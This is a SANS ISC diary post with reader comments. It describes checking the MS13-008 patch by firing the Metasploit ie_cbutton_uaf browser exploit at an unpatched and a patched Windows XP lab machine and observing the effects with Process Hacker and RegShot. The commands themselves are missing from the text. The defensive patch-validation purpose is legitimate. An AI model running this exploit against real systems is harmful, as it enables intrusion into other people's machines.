UpdateIncluding link to Process Hacker, thanks to the readers for pointing out this oversight! http://processhacker.sourceforge.net/ IntroductionEarlier last week a reader wrote in and asked us if the patch for MS13-008 [1] [2] had worked. To do a comprehensive patch validation could take a significant amount of time however there are a couple of things you can do to get a quick sanity check. I use Metasploit when doing patch sanity checks. Also, with a Virtual Machine you can take snapshots at various stages of patching. In this case my system is configured for VMWare Fusion Version 5.0.2 (900491) [4] and using Metasploit. Instructions for install of Metasploit exist all over the Internet so we will not reproduce that here. A great install for OS X Mountain Lion can be found here [5] however I avoid the Java component.
My setup includes two lab copies of Windows XP (I have been meaning to update to Windows 7 Using Google to Find ThingsTo run my quick sanity check, I will first locate the exploit within Metasploit ExploitDB. There are a couple of ways to achieve this. I usually start with a quick Google check first to locate the Metasploit page on MS13-008. Putting:
In my search bar yields what I’m looking for at the top of the results [6].
Note: You can take a look at this great presentation on some googleFu [7] and there are many books on the subject. Setting the TrapSecond is to get Metasploit running on an attacker machine and run the setup for the exploit of MS13-008. We do this by navigating to the page that shows us where the exploit is in the exploitDB [6]. We find from the documentation that what we are looking for is located at:
So we run the command:
Looking at the exploit documentation we are going to stick with the basic usage and enter:
Then we enter in the next command and set it to our host only IP:
And then enter:
From here you should see output like the below image:
My setup is simple. I have two virtual machines ready to go, one fully patched and one that is unpatched. We will look for a successful exploit to validate the Metasploit payload. Secondarily we will run it against a fully patched system and insure that it fails.
Note: Take Snapshots of virtual machines. It is a royal pain when you forget to do this
Springing the Trap
The first step on the target machine is to start Process Hacker [8] so we can observe the hack process start. This also allows us to watch some behavior as it occurs (cause we like that stuff right?
At this point we know the unpatched version of the Virtual Machine is exploited and MS13-008 is a successful vector as process hacker is showing the injection.
Checking the PatchNow for the quick sanity check and patch validation. Run the same exploit on your fully patched target virtual machine and the exploit should fail. In my case both my local VM anti-virus caught the exploit and the exploit failed after the anti-virus was disabled. Copy and paste your exploit location into the patch validation target and watch the metasploit output. In this case we are going to do a little bit more of a deeper monitor as we don't want to just trust what we see in Process Hacker. So we fire up RegShot [8] and take a one time snapshot, and we take a snapshot setting c: as the start directory. Note:This can take some time.
After this is complete we then copy and paste our exploit location into the target browser and check our results. Sure enough, Metasploit sents the malacious exploit payload but does not seem to get a process connect:
We then continue to do a quick check with Process Hacker and look at processes.
And finally we check a second RegShot and look at any changes to the operating system.
After review of the Regshot logs we can say with some confidence that the patched system survived the attack. We then enable our patched and updated Anti-Virus suite and run the attack again to check our AV signatures. It also picked up the attack.
Conclusion
In the fast paced often interupt driven lives we live in this method can act as a fast validation. Often times, when a reader writes in and asks if a patch took, this is the process I will use if I am in a hurry (
[1] http://isc.sans.edu/diary/January+2013+Microsoft+Out+of+Cycle+Patch/14941 [2] http://technet.microsoft.com/en-us/security/bulletin/ms13-008 [3] http://www.metasploit.com/ [4] http://www.vmware.com/products/fusion/overview.html [5] http://www.darkoperator.com/installing-metasploit-framewor/ [6] http://www.metasploit.com/modules/exploit/windows/browser/ie_cbutton_uaf [7] http://www.blackhat.com/presentations/bh-europe-05/BH_EU_05-Long.pdf [8] http://sourceforge.net/projects/regshot/
Richard Porter --- ISC Handler on Duty |
Richard 173 Posts ISC Handler Jan 22nd 2013 |
Thread locked Subscribe |
Jan 22nd 2013 9 years ago |
Aren't there easier ways of doing a comprehensive patch analysis on a box - Nessus w/ credentialed scan, Secunia PSI, FileHippo for 3rd party apps, MS Baseline Analyser, etc.?
|
Dean 135 Posts |
Quote |
Jan 22nd 2013 9 years ago |
dsh - SSHHH. Quiet. If there is a SANS post on patch validation using Metasploit, it is an *obvious* validation that using Metasploit is just fine in the enterprise. That way the IA peeps can keep their sploit skilz sharp for CTF and perhaps that sweet pentest gig they saw online, all while doing their day job. Don't you get it?
|
Anonymous |
Quote |
Jan 23rd 2013 9 years ago |
Guys, re-read the first sentence. The question was how can you tell if the patch actually worked to fix the exploit, not how to tell whether or not the patch was installed.
|
bkendall 7 Posts |
Quote |
Jan 23rd 2013 9 years ago |
The first use of [8] is for Process Hacker but that's not the link at the bottom. It is also on sourceforge. An interesting tool to find out about.
|
dave 21 Posts |
Quote |
Jan 23rd 2013 9 years ago |
Sign Up for Free or Log In to start participating in the conversation!